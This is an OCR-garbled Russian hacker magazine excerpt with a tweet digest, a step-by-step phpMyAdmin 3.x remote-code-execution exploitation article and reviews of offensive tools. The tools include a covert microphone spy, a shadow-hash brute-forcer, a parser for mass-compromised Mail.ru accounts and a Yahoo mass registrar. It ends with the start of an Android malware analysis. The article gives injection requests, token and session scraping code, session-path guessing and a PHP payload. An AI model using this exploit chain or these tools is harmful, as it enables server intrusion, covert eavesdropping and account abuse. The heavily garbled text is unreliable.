мышление, а надо бы проактивное! 
Комментарий: Мгсго5оН не хочет вводить 
программу вознаграждения за уязвимо- 
сти... Чарли Миллер намекает... 


(‘ЧКтодсоре: 

Как и обещал: удаленный 
гоо{-эксплойт для Ореп5Н 
3.5р1 под ЕгееВЗО. 


БЕр://.со/ОУНс 9 


(‘ЧсгурЕ0ач: 

Каждый раз, когда ты дума- 
ешь, что ты закончил фей- 
спалминг, появляется новая 
академическая работа, которая напоми- 
нает тебе — что заканчивать с этим ещё 
рано... #/ОР. 

Комментарий: ОР — уитр Опещед 
Ргодгатипттод, тот же КОР, только для 
передачи управления используется 
регистр (.МР гед), а не слово из стека 
при КЕТМ. 


(Ч]егетгаВо: 

_ «Нарушение безопасности 

. т в КА заставили компанию 

_ предложить клиентам заме- 
нить почти весь миллион Токенов» = вот 


| цена зеро-дея. 


(‘Агте[_Согопе!: 

Гугль должен заполнять авто- 
матически всю инфу обо мне 
в Гугл+. Ну же... вы же знаете, 


где я живу, с кем общаюсь, сплю ли или 
нетит.д. 


(адаКати: 

Итак, моя 88-летняя бабуля тра- 
тит последние несколько часов 
перед сном, играя в видео 
игрули на 'Рай’е. Мы живем в будущем. 


(ЧаКасКгезеагсй: 
Неважно, есть ли у тебя 
сисадмин, сканер уязвимо- 
стей или рок-звезда иссле- 
дователь — тебя все равно поимеют. 
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ВЗЛОМ 
— {мо Пса 884888, Ир://зп!ррег.ги} 


х 


ПАЛОПА 


Взлом известного ДВИЖКА с помощью 
нашумевшего бага в глобализации переменных 


э Седьмого июля текущего года все продвинутое |Т-сообщество 
всполошилось в связи с появлением известия о том, что все последние 
версии дефолтного Муз !-менеджера рирМуАд тит уязвимы к некой 
детской атаке, связанной с неконтролируемоий глобализацией 
переменных. Предлагаю тебе вместе со мной окунуться в 
увлекательное исследование анатомии данной уязвимости. 


Ты спросишь, что в этом коде такого интересного? Обрати вНиИ- 


Я надеюсь, что тебе не надо объяснять, что такое рИрМуАдгтит и мание на функцию рагзе_<{г(). В предыдущих выпусках журнала 
с чем его едят, поэтому перейдем сразу к его хладному трупу :}. ты уже мог неоднократно прочитать о том, что при определенных 
Седьмого июля некий буржуйский багокопатель под ником Мапдо условиях из-за данной функции может возникнуть баг с так назы- 
обнаружил следующее интересное место в коде движка: ваемой неконтролируемой глобализацией переменных. В данном 
случае такими условиями являются: 
. /116гаг1е$ /аиВ/змеКеу/зиеКеу .аи В .116.рИр 1. Отсутствие второго параметра в функции рагзе_54г(}; 
1+ ($&г54г($ $ЕК\МЕВ[ 'ОЧЕВУ $ТКТМ6'], '5е5$5$10п_%0_ипзее') 2. Полный контроль удаленного пользователя над переменной; 
|= а15е) $ СЕКУЕВГОЧЕВУ _$5ТЕИМС!] [это то, что идет в ссылке после 
{ знака «?»). 
раг5е_$+г($_$ЕВ\ЕВ [ "ОЧЕКУ $ТВТМб' ]); В первые несколько дней после обнаружения уязвимости никто 
5е$$10п_мг1{е_с10$е(); не мог или не хотел вникать в ее суть (в том числе и я]. Данная 
5е5$10п_14($5е$$10п_$о_ип$е*); ситуация была крайне забавной, так как автор даже указал воз- 
5е$$10п_5%аг*(); можный вектор применения бага: перезапись глобального массива 
$ $ЕЗ5ТОМ = аггау(); $ 5ЕЗЗОМ, эффект от которой сохранится даже после перезагруз- 
5е$$10п_мг1%е_с10$е(); ки страницы. 
5е5$10п_Ае5%гоу(); В своем оригинальном сообщении Мапдо пишет, что при про- 
ех1+; смотре указанного выше подозрительного кода может создаться 
} впечатление, будто перезаписанная сессия уничтожится. Но это не 


так. В данном случае функция зе5$1оп_м/гКе_с(о$е() сохранит нашу 
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Успешное выполнение КН через баг в сериали- 
заторе сессий 


перезаписанную сессию, а затем зе$$1оп_19(} запустит 
новую сессию, не имеющую ровным счетом ничего 
общего с нашей. Из-за такого переключения сессий баг 
очень сложно было бы обнаружить с помощью обычно- 
го браузера, так как е5$1оп_${аг(] пошлет нам новые 
куки и попросит забыть о модифицированной сессии. 
Пример инжекта произвольных переменных в сессию 
выглядит так: 


ПЕЁЕр: //рта/ ?5е$$10п_фо_ип5е{=123&$оКеп= 
[ТОКЕН ]&_$5ЕЗЗТОМ [оо | =Баг 


Так как переменные сессии принимают участие во мно- 
жестве мест движка, теоретически может возникнуть 
куча Х$5 и 5 -дырок. Однако мы сфокусируемся на 
нескольких наиболее серьезных векторах. 


Первый вектор атаки 


Для понимания первого вектора атаки мы должны 
пройтись по исходному коду нескольких файлов. 
Сначала давай заглянем в код класса для автомати- 
ческой генерации конфига ./зе&ир/ИЬ/Сопйдбепега{ог. 
с[а$$.рПр: 


рчб11с $фаЕ1с РипсЕ1оп ве*СопйЯвЕ11е() 
у 


$с = $сЕ->ве*СопЯв(); 


рев = ню. УЕСТЕ 
1+ ($сЕ->веЕ$егуегСоипт*() > 9) { 


фогеасй ($с['5егуег$'] а$ $14 => $5егуег) { 


фгеЕ .= '/* $егуег: ' 
5 гг ($с+->ве%5егуегМаме ($1а), '*/', '-') 
а ГЕ. Е ЗЕЕ, 


Теперь нам нужно разобраться в этой каше. Первым 
делом обрати внимание на то, что данный код генерирует 
РНР-листинг с конфигом для рЮрМуАадгпит. Здесь можно 
заметить, что ключ массива $с['Бегуегз'] [переменная 
Фа) не фильтруется. Таким образом, если мы сможем 
переименовать этот ключ в массиве, то сможем закрыть 
комментарий и проинжектить произвольный код. 

Далее смотрим на функцию де{Сопй9й, с помощью 
которой и получается нужный нам массив $с: 


. /116гаг1е$ /сопЯ=/СопЯ=Е11е.с1а$$ .рИр 
рчб11с РипсЕ1оп вееСопйв( ) 


{ 
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Работа первого эксплоита Мапдо 
$с = $ $Е$ЗТОМ[$+11$->14]; 


гефигп $с; 


} 


Бинго! Переменная $с полностью зависит от массива 

$ 5ЕЗЗОМ, который, как ты уже понял, находится под 
нашим контролем! Теперь мы легко сможем инжектнуть 
произвольный РНР-код, который будет сохранен в файл 
/сопНа/сопНа./пс.рНр. 

В данном способе эксплуатации нет никаких ограниче- 
ний (вроде авторизации или обязательного отключения 
пад!с_аио{ез_9дрс}. Омрачает ситуацию лишь один 

факт — папка ./сопНд не является дефолтной для движка, 
так что попасть в точку ты сможешь лишь один раз из ста. 


Второй вектор атаки 


Второй способ уже не зависит от наличия папки ./сопйд 
на сервере. Зато появляются две другие зависимости: 
падс_ди0е$_дрс = Оп и наличие логина и пароля к 
любой из баз данных текущего ту$а(-сервера. 
Начинаем потрошение исходников: 


. /зегуег_5упсйгоп12е.рИр 
ЕР р ЧаБ — АЕБ ЕЕ: 
фипсомтоп_+аб1е$ = $_$Е$$ТОМ[ "ипсомтоп_%аб1е$з']; 


РМА_сгеаеТаггеЕТаб1е$ ($5гс_а6, $%г=_аЬ, 
$5гс_11пК, $Ег_11пК, Ф$ипсоттоп_абБ1е$, 
фипсотмтоп_+аб1е_5%гис%иге_491++[$$], 
фипсотмтоп_+аб1ез_#е14$, Фа15е); 


Смотрим на функцию РМА_сгеаеТагде{ Та е5 


. /116гаг1е$ /зегуег_зупсИгоп12е. 116. рр 

фипсЕтоп РМА_сгеафеТагве{Та61е$ ($$гс_а6, 
ФЕБР Я. Уорс ТТК, ЗЕРЕТаИК, 
&Фипсоттоп_Фаб1е$з, $+аб1е_1паех, 
&Фипсоттоп_аб1ез_Яе14$, $а15р1ау) 


$Сгеа{е_Таб1е_Очегу = ргев_гер1Тасе('/' 
.РМА_Баскачо*е (Ф$ипсоттоп_+аб1е$ [ $ аб61е_1падех]) 
.'/', РМА_БаскКачо*е ($+г=_46).' 
.РМА_Баскачо*е ( 
фипсоттоп {аБ1е$ [ $+а61е_1паех]), 


| МАВММ6_ 


› ммагтт9 

Ни автор, ни редакция 
не несут никакой 
ответственности за 
любой возможный 
вред, причиненный 
материалами данной 
статьи. 


| 0\У0 


› ЧУЧ 

На нашем диске 

ты сможешь найти 
эксплоиты ко всем 
описанным уязвимо- 
СТЯМ. 
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Работа второго эксплоита Мапдо 


$Сгеа*е_Оицегу, $11т1* = 1); 


Если ты внимательно следил за руками, то должен был заме- 
тить, что переменные Фипсопттоп {аб {е$[$4аб(е_п4дех] и 
$1г9_Ч6 переходят в функцию ргед_гер(асе(} прямиком из мас- 
сива $ 5Е5$[ОМ. Так как я более чем уверен, что ты наслышан 
об одном из самых распространенных багов в РНР-движках — 
выполнении произвольного кода в ргед_гер[асе(} с модифи- 
катором «е» [еуа], перейдем сразу к делу. В данном случае 

мы можем проинжектить модификатор «е» в первый параметр 
уязвимой функции с помощью банального нуллбайта примерно 
так: (.+]/е%00. Все, что идет после нуллбайта, сразу же отпадет, 
и компилятор не будет ругаться на неправильно построенную 
регулярку :]. Дабы не засорять страницы журнала килобайтами 
кода, демонстрирующего работоспособность этого и предыду- 
щего способов эксплуатации нашего бага, я заботливо положил 
на наш диск соответствующие эксплоиты, с которыми и советую 
тебе ознакомиться. 

Кстати, известный 5иПоз$ш ра{сй от Стефана Эссера успешно 
закрывает багу с нуллбайтом и модификатором «е», так что здесь 
мы получаем еще одно суровое ограничение. 


Тепличные эксплоиты 


Теперь небольшое лирическое отступление. Уязвимость с переза- 
писью глобальных переменных сама по себе не является чем-то 
фатальным. Здесь нужно найти какой-либо вектор эксплуатации 
с любой из перезаписанных переменных. Это может не всегда 
получиться. В данном случае Мапдо нашел сразу два таких векто- 
ра, но эксплоиты по их мотивам получились крайне тепличными, 
необходимость авторизации и наличия недефолтной директории 
для успешного использования бага не давали нам ничего на 
практике. 

Как ты уже понял, такая ситуация крайне меня не устраивала, 
поэтому после появления первых РоС я решил провести самостоя- 
тельное расследование. Здесь как нельзя кстати под руку подвер- 
нулся классный прошлогодний баг Стефана Эссера под названием 
«РНР 5$ез51оп 5епа|тег 5еззюп [ака |п]есйоп УипегабЦКу», кото- 
рый очень хорошо согласовывался с уязвимостью в ипзепайте} и 
«волшебных методах» РНР (ссылки на соответствующие статьи из 
прошлых номеров нашего журнала ищи в сносках). 


Уязвимость в сессиях 


Итак, остановимся немного подробней на вышеобозначенной уяз- 
вимости. По дефолту РНР-десериализатор сессий знает два специ- 
альных символа: Р5_ОЕНММПЕК и Р5_ОМОЕЕ_МАККЕК. Первый 
юзается для разделения сохраненных в сессии переменных, а вто- 
рой маркирует неопределенные переменные и представляет собой 
обычный восклицательный знак. Заглянем в исходники РНР: 


ий11е (р < епар*г) { 
гуа1 **тр; 


Ч=р, 
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ир11е (*а != Р5_РЕЁЕТМТТЕВ) { 
1+ (++49 >= епарЕг) гофо БгеаК_оч%ег_1оор; 


} 

1+ (р[9] == Р$_УМОЕР_МАВКЕВ) { 
р++; 
Па$_\уа1ие = 0; 

} е1 зе { 
Па$_\уа1ие = 1; 

} 


Проблема этого кода заключается в том, что сериализатор сессии 
корректно обрабатывает только символ Р5_ОЕНМИЕК и забивает 
большой болт на Р5_ОМОЕЕР_МАВКЕК. 

В результате своего исследования Стефан Эссер нашел спо- 

соб внедрения произвольных данных (если быть точнее: строк, 
чисел, массивов и объектов} в сессию с помощью ключа масси- 
ва $ $Е5 $10 М, начинающегося с символа Р5_УМОЕЕ_МАВКЕК. 
Примеры уязвимого к данной атаке кода выглядят так: 


<РрИр 

5е5$10п_$Фаг®(); 

$ $ЕЗЗТОМ[$_РОЗТ[ 'ргейх'] . "Б1а'] = $_РОЗТ[ "'аажа']; 
?> 


<РрИр 

5е55$10п_5%аг{(); 

$ ЗЕЗЗТОМ = аггау_ тегге($ _$Е$$ТОМ, $_РОЗТ); 
?> 


Эксплуатация здесь выглядит крайне тривиально: посылаем РОЗТ- 
запрос ргейх=! и дажа= | ххх |О: 10: "е\1106ес*":0:{}. 

В результате получаем инжект сериализованного объекта прями- 
ком в сессии. Не забывай, что данное внедрение аналогично вне- 
дрению в функцию ипзета|те]). 


Вспоминая молодость 


Если ты внимательно следишь за нашим журналом, то должен 
помнить, что в тех же статьях про «волшебные методы» я описывал 
классный способ эксплуатации бага с десериализацией во второй 
ветке рАрМуАдгит. 

Тогда авторы поступили не совсем логично. Сама уязвимая функ- 
ция ипзенате(), конечно же, была убрана из исходников движка, 
зато полезный нам код в функции _ м/аКечр() остался во всей тре- 
тьей ветке совершенно нетронутым. 

Теперь осталось только вспомнить механизм действия старого 
эксплоита, применить новые фишки и запилить новый убойный 
эксплоит. Итак, старый код для эксплуатации выглядел примерно 
следующим образом: 


ПЕЕр: //1{е. сот/рирМуАдт1п/ $ сг1рЕ$/ зефир. рИр? 
ас&1оп=]ау_па\1а{1оп&ео1{уре=ип1х&фоКеп= [ ТОКЕН] & 
сопйвига*1оп=а:1:{1:0;0:10: "РМА_СопЯё" :1: 

{$:6:"зоигсе" ;5 : [ ДЛИНА _ПУТИ] : "[ПУТЬ_К_ЕТР_С_ИНЖЕКТОМ]"; }} 


Здесь мы получали классический ВКН-баг, омрачавшийся лишь 
проверкой на локальность с помощью мерзопакостной функции 
Н(е_ех!з{${), которая, впрочем, легко обходилась с помощью указа- 
ния файла на любом доступном ЕТР-сервере. 

Не буду глубоко вдаваться в подробности [советую прямо сейчас 
прочитать соответствующие статьи по ссылкам в сносках], а скажу 
лишь, что со временем ребята с гдо{.ога нашли способ работы 
данного сплоита без ЕТР с помощью инжекта прямо в файл сессии. 
Таким образом, наш ипзепа(те()-эксплоит становился универсаль- 
ным для всех версий рирМуАдтит < 3. 
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Описание бага, найденного Стефаном Эссером 


Новая жизнь старых багов 


Намотав на ус вышеописанную информацию, ты, наверное, уже 
понял, что теперь мы приступим к написанию универсального экс- 
плоита для рАрМуАдплип всей третьей ветки :]. Сначала нам нужно 
узнать токен, с помощью которого движок проверяет валидность 
запросов (только с помощью валидного токена мы сможем сохра- 
нить в сессию произвольные данные). Делается это достаточно 
просто: 

1. Заходим на главную рИрМуа@дтип; 

2. Парсим токен из НТМЕ-исходника страницы, например, так: 


ргев_тафсв( 
'@пате="+океп" уа1ие=" ([а-+0-9]{32})"@15$' ,$раве ‚$%о); 


ффоКеп = $%0[1]; 


3. Гаким же образом и стой же главной страницы парсим кукисы с 
идентификатором текущей сессии: 


ргеё_тафсв ( 
'@рирМуАат1т= ( [а-70-9]{32,40}); ?@1$' ,$раве,$5е); 
$ъ5е5$51оп = $$5е[1]; 


4. Теперь пытаемся узнать текущий путь к папке с сессиями для 
успешного инклуда. Делается это с помощью простейшего цикла 
у/ПЦе и списка наиболее популярных мест в системе: 


$5е$$5 _рафИ = аггау( 
"/Етшр/', 

'/маг/%тр/', 
'/маг/116/рир/', 
'/\аг/116/рир4/', 
‘Умавитть/рирь/”, 
'/маг/116/рИр/5е$$1оп/', 
'/\аг/116/рпр4/зе$$1оп/', 
'/\маг/116/рИр5/зе$$1оп/', 


Сам запрос для проверки на корректный инклуд в цикле выглядит 
примерно так: 
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$1п]] = $5е$55 ра И[$о]. '5е$$_'.$5е$$1оп; 


фачегу = $рта. ' ?5е5$1оп_+0о_ип5е*=123&*оКеп='. 

фЕоКеп. '& ЗЕЗЗТОМ[  !61а]='.иг1епсоде( 
|| ххх[а: 1: [1:0.0: 19; "РМА_СоплБ". 1: 15:6; "зоцисе" 5: °. 
СЕРВ (о: 


Здесь: $5е$5$ _ра{№[$о] — это каждый путь из массива $5е$$_ра{Й 
по порядку, $5е5$1оп — полученный выше идентификатор сессии, 
$фрта — путь к движку, ${юКеп — полученный выше токен. 
Запрос Фдиегу следует посылать два раза: в первый раз проис- 
ходит сам инжект, а во второй — проверка корректности пути к 
сессии. Если путь правильный, произойдет успешный инклуд, и 
мы увидим на экране содержимое файла сессии. Отследить инклуд 
можно по ключевому слову «РМА_СопйНд». 

После успешного инклуда ты можешь спокойно внедрять свой 
РНР-код. Внедрение можно произвести с помощью все того же 
бага с переопределением глобальных переменных: 


& ЗЕЗЗТОМ [рау1оаа ]=<?рпр рНр1п+о(); ?> 


Наша переменная рауоа@ попадает в файл сессии, после чего мы 
вполне сможем выполнить код при помощи описываемого КГ|. 
Готовый эксплоит с сессиями ты также сможешь найти на нашем 
диске. Здесь хочу заметить, что, хотя данный способ и является 
более универсальным, чем способы Мапоао, он тоже несколько 
ограничен: тад!с_ацое$_дрс = оНи РНР <= 5.2.13 & РНР <= 
5.3.2. Данные ограничения все же ничто по сравнению с необхо- 
димостью наличия нестандартной открытой на запись папки на 
сервере. 


Злоключение 


Как видишь, любой когда-либо обнаруженный баг может еще 
вернуться и нанести свой удар по известнейшим программным 
продуктам. Особенно доставляет в данной ситуации тот факт, 

что наконец-то нашлось практическое применение для бага с 
сессиями Стефана Эссера (пока что в паблике не было ни одного 
РоС по теме). Тебе же я могу посоветовать никогда не смотреть 
на крутость и известность движка, а просто брать и потрошить 
его :]. = 
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Программа: Весоадеру. 5 
ае/епаег Рис 

ОС: МЛпаом/$ 2000/ХР/2003 
5егуег/\1$1а/2008 5егуег/ / 
Автор: Р$2Сатег & СуКо 


с Бы. ВИН Я мвд Мы. Вы. Миника М Гозбыи 
: о тж еее аки 


РНР на лопатках 


Наконец-то в паблике появился приличный 
дешифровщик нетолько крипта Гепа, нои всем 
набившего оскомину топСире. Итак, встречаем! 
Оесодеру. 0$ ае/епаег РиБс — это полно- 
функциональный РНР-декодер, родившийся 

в дебрях специализированного буржуйского 
форума Чесодеру.и$. Пользоваться прогой не 
просто, а очень просто: 

1. Заливаем все файлы к себе на диск. 

2. Кидаем зашифрованные скрипты в папку 
01_Песоче. 

3. Запускаем сценарий Оесоде АГ ЕЦез.Ба. 
4. Смотрим на расшифрованные исходники в 
папке 02_Оесодеч [здесь же будет находить- 

ся и файлик [о9_ПОесодед. 4х с логом работы 
декодера]. 

Прога работает со всеми версиями Винды и 
поддерживает следующие лоадеры: 


1опСибе РНР Гоааег \3.1 
Мизрпеге РИрЕхрге$$ \3.60 
Гепа Ор{1т17ег \3.3 


От себя могу посоветовать тебе зарегистриро- 
ваться натом самом форуме Чдесодеру. из, так 
кактам можно найти еще очень много полез- 
нейшего стаффа. 


Программа: Меру Ву 51ЕЗНТ.0Б 
ОС: М/паом/$ 2000/ХР/2003 5егуег/ 
\М$а/2008 5егуег/ 7 

Автор: 51ЕЗН 

В одном из прошлых выпусков рубрики я уже 
описывал микрофонного шпиона под назва- 
нием Мсеру-+ от Мо тпаге. Данная утилита 
неплохо справлялась со своей задачей, но, как 
иу всех уникальных в своем роде программ, у 
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о йоы 


Шпионим за звуком 


нее имелись свои недоработки и недостатки. 
Одним изтаких недостатков было неудобство 
управления процессом записи звука. Настало 
время исправить это недоразумение, так что 
спешу представить твоему вниманию прогу 
М'с5ру Ву 5ЕЕЗН, созданную по мотивам упо- 
мянутого выше М!с5ру++. Какясно из названия, 
данная прога предназначена для скрытой запи- 
си звука сустройства для записи голоса, уста- 
новленного по умолчанию в системе (микрофон, 
линейный вход, или стерео/моно МИКС]. 
Особенности шпиона: 

1. Данные записываются в формате тр3, 24 
кГц, 32 кбит/с, моно. 

2. Для записи используется стандартный вин- 
довый кодек МРЕС [Г АУЕК-3. 

3. Название файлов генерируется как «год_ме- 
сяц_день час-минуты-секунды.тр3». 

4. Управление программой осуществляется 
через \/ЕВ-интерфейс. Для администриро- 
вания ты должен подключиться к порту 4545 

(В р://127.0.0.1:4545]. 

Админка утилиты предоставляет следующие 


функции: 


® выгрузка программы; 

® начало/остановка записи; 

» отображение списка записанных файлов 
+ их размер; 

® удаление записанных файлов; 

»® скачивание записанных файлов. 


Как пишетсам автор, шпион пока что довольно 
сыроват, ноты слегкостью сможешь доделать 
функцию обхода виндового файрвола, атакже 
инсталл в систему, благо исходники програм- 
мы идутс ней в комплекте: 

1. Мис5ру.Чрг — основная часть (реализация 
админки). 

2. АР1.ра$ — константы, типы и функции. 

3. МсКВес.ра$ — функции записи. 


Хакерский 
сот от 
БаскпаГов 


Программа: Веб-разведка 
ОС: *пх/АМп 
Автор: Кузьмин Антон & Зуег 


Веб-разведка - работа с отчетами 


Просмотр кхрты “Пели 


ооо о 


Отчеты «Веб-разведки» 


По уже ставшей доброй традиции спешу 
поделиться стобой очередной тулзой «все в 
одном». 

На этот разтаким комбайном является про- 
граммный комплекс «Веб-разведка», который 
предназначен для внешнего исследования 
сайтов с целью обнаружения аномалий в их 
работе, различных сбоев, атакже потенциаль- 
но уязвимых мест. 

На данный момент «Веб-разведка» умеет 
следующее: 

1. Осуществлять поиск скрытых файлови 
директорий (ссылок на которые на целевом 
сайте нет}. 

2. Осуществлять сигнатурное опознание 
установленных на сайте распространяемых 
компонентов (М/У5 М/Уб-редакторы, СМ5, 
форумы ит.д... 

3. Осуществлять поиск резервных копий фай- 
лов сайта. 

4. Строить карту сайта, описывающую его вну- 
треннюю файловую архитектуру. 

5. Анализировать контент сайта с целью 
обнаружения в нем подозрительных данных 
(Например, текстов ошибок). 

6. Проводить фаззинг-тестирование с целью 
выявления сбоев в работе веб-приложений. 
7. Многое другое (прочитать обо всех способах 
применения комплекса ты сможешь в прила- 
гаемой документации). 

Из особенностей данного хакерского комбайна 
можно особенно выделить его модульное по- 
строение: 


» веб-паук; 
® поисковик файлов и директорий; 
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® поисковик распространяемых компонентов; 
» поисковик резервных копий; 
® фаззер. 


Каждый из модулей реализован в виде отдель- 
ного скрипта, находящегося в директории «./ 
гип» корневой папки приложения. Все модули 
умеют взаимодействовать друг с другом, а 
именно использовать и дополнять результа- 
ты работы других скриптов. Общей их целью 
является составление более точной структур- 
ной карты сайта, а также сбор информации о 
встречающихся заголовках, медленных местах 
приложений, кодах ответов и многом другом. 
Просмотр итогов работы производится в от- 
дельном приложении для работы с отчетами. 
Такое разделение между графической и основ- 
ной функциональной частями сделано для 
того, чтобы последнюю можно было размещать 
на достаточно слабых системах и управлять 

ее работой с помощью командной строки. 
Основная же работа по анализу полученной 
информации осуществляется в отдельном 
приложении, которое может быть размещено, 
например, на домашнем компьютере и иметь 

в распоряжении больше ресурсов. Установка 
данного набора скриптов очень проста. Скопи- 
руй все файлы ксебе на диск и выставь права 
на запись директориям «./гези $», «./базез», 
«./да{а» и их вложенным папкам. Затем открой 
файл сопйд.1пти заполни все параметры в сек- 
ции «ЧБ». Обрати внимание нато, что еслиты 
не укажешь логин и пароль, то соединение бу- 
дет происходить без запроса авторизации во- 
обще. После этого ты сразу можешь пробовать 
запускать скрипты. В случае каких-то ошибок 
они выведут соответствующее сообщение. 
Подробный видеоурок по работе с комплексом, 
атакже мануалы и некоторые дополненияты 
сможешь найти в официальном блоге группы 
Каск45ес, расположенном по адресу ПаскА$ес. 
Бодзрой. сот. 


Программа: Вазп-Впилоюгсег 
ОС:*пх 
Автор: Субег-рипК апа 53 то2553 
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Е м И 


Легкий брут ппа5 


Представьтакую ситуацию: ты находишь на 
похаченном сервере итебе надо пробрутать 
определенные пп95-хеши или хеши из файла / 
е{с/5<Вадо\“. При этом утебя нет возможности 
или ты не хочешь использовать какие-либо 
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специализированные утилиты для брута. 
Спешутебя обрадовать! В данной ситуации 
тебе поможет простой БазВ-скрипт Вай - 
Вгукотогсег, который использует для процесса 
брута только стандартные возможности шелла. 
Данный сценарий настолько просто, что со- 
стоит всего лишь изтрех функций: 

1. перебор пароля к заданному зВадом/-файлу; 
2. перебор пароля по цифрам; 

3. перебор пароля по словарю. 

Основное преимущество скрипта — это работа 
со стандартными утилитами, входящими в 
основу почти любой сборки [Чпих. 
Использовать его крайне просто: 


. /та5бгифе. ®Н -и(ога115$*) | -п(итбег) | 
-1(пРогта1оп) | -6 (гифе$Падом) 
ПазН | °<Падом 

-и — словарь (Х="/чзг/Паге/а1с*е/ 
мога$” в скрипте) 

-п — цифры по порядку 

-6 — брут файла $Падом 


Также существует и сишная версия данного 
скрипта, которую ты также сможешь найти на 
нашем диске. 

Автор с удовольствием выслушаеттвои пред- 
ложения и пожелания втопике на Античате 


([Ы.у/даМАкКч). 


Программа:Парсер писем 
для Май.ги 

ОС: *пх/ММП 

Автор: Гер$1$ 


а ай 


5 + в, * *- 


5+ №. Офес 


Ема рт 


НИЧЕ р Рариир иг Тенты КИ р. ПО рр ри Вр 


НЕБЕ ЕЕ сара ЧерНЕЕЫ 
Ш = Ш ПИТ Е Пт 
Гы Биты вннны = 1 
р кии › 


Зе ры и =" Ба м Е 


== = 1 ИИ" № ПЕН ОНИ” БЛНННИ 
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Конфиг парсера для Май.ги 


Если ты владеешь почтовым ящиком на за- 
мечательном сервисе Мац.Ки, то тебе ничего 
не стоит найти в нем нужное письмо. Но что 
делать, если количество твоих (или не совсем 
твоих :] мейлбоксов измеряется в сотнях и 
даже тысячах? Как вспомнить, в каком из 
ящиков лежит нужное письмо с регистрацией 
втвоей любимой социальной сети? На помощь 
приходит многофункциональный перловый 
скрипт под незатейливым названием «Парсер 
писем для МаЦ.ги» от мембера Античата 
Герз!5`а. 

Особенности работы скрипта: 

® работа идет по списку аккаунтов вида: 


1051п@та11 .ги:ра$$ 
1051п@115{ .ги:ра$$ 
1о51п@бК.ги:ра$$ 
1051п@1пБох.ги:ра$$ 


® поддержка всех доменов Мейл.РУу; 

® многопоточность; 

® работа через веб-интерфейс почтовика; 
отсутствие поддержки прокси. 
Возможности скрипта следующие: 

® Проверка аккаунтов на валидность. 

® Поиск в почтовом ящике писем, соответ- 
ствующих определенному запросу (слову или 
фразе]. 

® Сохранение писем, найденных по опреде- 
ленному запросу. Сохранить письма можно как 
ий или текст. 

® Удаление писем, найденных по определен- 
ному запросу. 

® Поиск с помощью регулярных выражений 

и сохранение определенной информации из 
писем, найденных по какому-либо запросу. 
Перед началом работы с утилитой тебе нужно 
ее сконфигурировать. Еслиты не смог разо- 
браться в комментариях автора в исходнике, то 
добро пожаловать в топик БИ. (у/псЕРЕВ, благо 


здесь можно найти примеры различных конфи- 
гов для различных задач, связанных с работой 
парсера. 


Программа: К-Ш0 МАКЕК 
ОС: М/паом/$ 2000/ХР/2003 
5егуег/\/$1а/2008 5егуег/7 
Автор: Раг$Ргод 5ой\миаге 


т ТГ 


Массовая регистрация ящиков Уапоо 


Последним в нашем сегодняшнем обзоре вы- 
ступает реггер аккаунтов почтовика \аПоо. 
Особенности проги: 


» работает в полуавтоматическом режиме 
(ты должен вбивать капчу); 

» генерирует новые ящики по заданным 
параметрам; 

» отличная скорость работы; 

» возможность работы через прокси; 

» возможность выбора сервера Уапоо. 


Процесс работы с реггером выглядит достаточ- 
но тривиально: 

1. Вбивай в поле Уароо [0 предпочитаемое имя 
ящика (следующие прога сгенерирует сама]. 
2. В поле Разз\/ога — паролькящику. 

3. ВЕ г${ патеи [а5{ пате — личные данные 
владельца аккаунта, остальные поля по 
желанию. 

4. Далее жми кнопку «ТАКТ», вбивай капчу и 
нажимай «СКЕАТЕ». 

5. Смотри на результат работы в папке с про- 
граммой. == 
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АМОВОЮ-УБИИЦА 


Разбираем малварь для популярной 


мобильной системы 


© Эту статью я решил посвятить разбору зловреда 
(Тгоуап-эМз.Апдго!40ъ.РаКеР[ауег) под мобильную платформу 
Апаго!д. Попутно я покажу все «внутренности» арК-фаила 


и опишу назначение каждой из них. 


Для установки и запуска приложений под платформой Апаго!а 
используются специальные файлы с расширением «арк» 
(Апагога РасКаде}. Такой файл представляет собой обычный 
Д]Р-архив с определенной структурой. Вот, что получилось, 
когда я распаковал 7-И71р`ом мой Р(ауегарк [рис. 1). 

Итого, из арК-архива в корень были извлечены три файла 

и две папки. Папки называются МЕТА-[МЕ и гез, а файлы — 
Апаго!9МапНез{.хгп(, с[аз5е5.4ех и гезоигсез.агзс. Эти файлы 
и папки будут присутствовать в любом аркК-архиве. Давай по 
порядку пройдемся по каждому элементу только что распотро- 
шенного контейнера. 
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Са$зе$.аех 


Файл с[!аз5е5.4ех — основной компонент арК-архива, содержащий 
код виртуальной машины Па\мК Уна! МасВте. Стоит отме- 

тить, что несмотря на то, что программы под Апаго!а пишутся на 
языке /ауа, после компиляции исходных текстов в файлы .с[аз$, 
дополнительно вызывается утилита «Ах», которая преобразует 
полученные скомпилированные файлы в модуль «.4ех», который 
может быть исполнен вышеупомянутой виртуальной машиной. 
Таким образом, чтобы разобрать логику работы зловреда, нужно 
«копать» именно этот файл. Но к с[аз5е$.4ех я вернусь позже, 
когда опишу остальные составляющий исходного архива. 
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Мате / Ех 5ее 

ОТВ. 
В МЕТА-ШМЕ ОТВ. 
В те$ ОА. 
{= АпагоаМап!ез.хги| 1368 


‹ | @а55е5.4дех 5 392 
| "езоугсе$, аг5с 952 


'Бае 'Тпе  |АМ | 
20.07.2011 22:17:52 
19.07.2011 21:27:52 


19.07.2011 21:27:52 
Иконка, исполь- 
16.02.2011 15:35:54 д зуемая Тгоап- 
$М$.Апагоао5. 
16.02.2011 15!35!54 акеР!ауег 
16.02.2011 15:35:54 д 


У. 


Содержимое Рауег.арк 


ЮРезоигсе$.аг$с 


Этот файл представляет собой скомпилированный 
хпп[-конфиг, отвечающий за ресурсы. Я попро- 
бовал открыть его в Н!ем,, но это мне [что логично 
:}] ничего не дало. Тогда я воспользовался бес- 
платным декомпилятором АРКТоо! ([соде.доод(е. 
соп/р/апЧ9го!Ч-арКоо|. Он отлично подходит для 
преобразования бинарных хт[`ек в оригинальный 
вид. В результате работы этой утилиты я получил 
два файла: рибИс.хт( и ${г1па$.хп(. Содержимое 
первого: 


<?хт1 уег51о0оп="1.0" епсод91п8="и{+-8"?> 
<гезоцгсе$> 

<ручб11с фуре="агамаб1е" пате="1соп" 
14="0х7+020000" /> 

<рчб11с фуре="1ауоцч{" пате="та1п" 
14="0х7+030000" /> 

<рчб11с фуре=" ${г1пй" пате="арр_пате" 
14="0х7+040000" /> 

</гезоигсе$ > 


РубИс.хт( — контейнер, в котором расположена 
основная информация о ресурсах, используемых 
приложением. 

Существует несколько определенных типов ресур- 
сов: Апитайоп, Союг ЗТае 1$, Ога\ммаб(е, [ауоц(, 
Мепи, 5{птд, 5{Уе и прочие. Однако в данном слу- 
